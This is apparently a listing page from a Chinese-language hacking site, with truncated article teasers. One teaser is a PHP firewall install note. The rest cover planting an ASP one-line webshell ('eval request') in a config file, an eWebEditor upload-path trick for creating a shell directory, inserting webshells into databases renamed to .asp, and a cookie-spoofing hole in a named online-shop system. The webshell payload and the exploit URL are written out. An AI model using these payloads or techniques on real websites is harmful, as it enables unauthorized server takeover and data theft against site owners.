-
PHP-CC防火墙
安装方法:创建目录firewall,把压缩包里的文件放进去,此目录必须为777(可写)之后在全局的文件调用include "firewall/fw_public.php";就算安装完成了之后打开 fw_conf.php把...
-
一句话插配置文件
句话插入配置文件system.asp没有过滤双引号,插入一句就行。常规插法如下:"%><%eval request("d")%><%但金刀客这篇文件(http://www.cqzh.cn...
-
ewebeditor通杀鸡肋0day
我曾经发现一个改版的EWEB 5.5先访问这个地址Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp访问这个地址可以建立个A.A...
-
详解数据库插马技巧
我们知道有时候我们有暴库的时候,一些站长喜欢把数据库的后缀名改成asp以防止下载.可是,我们知道,如果数据库文件里包含asp代码.那么我们就可以直接访问数据库了,这些asp代码就会执行,这就是数据库插马的原理!首先百度下,关键字:"...
-
正版逍遥网店系统 V3.0 COOKIE欺骗漏洞
OK开始,这是一个网店,本来我想先找注入,貌似注入都过滤了。于是我又来到后台,看了下检测文件,悲剧由此产生:漏洞文件:checkadmin.asp<%if request.cookies("buyok")(&quo...
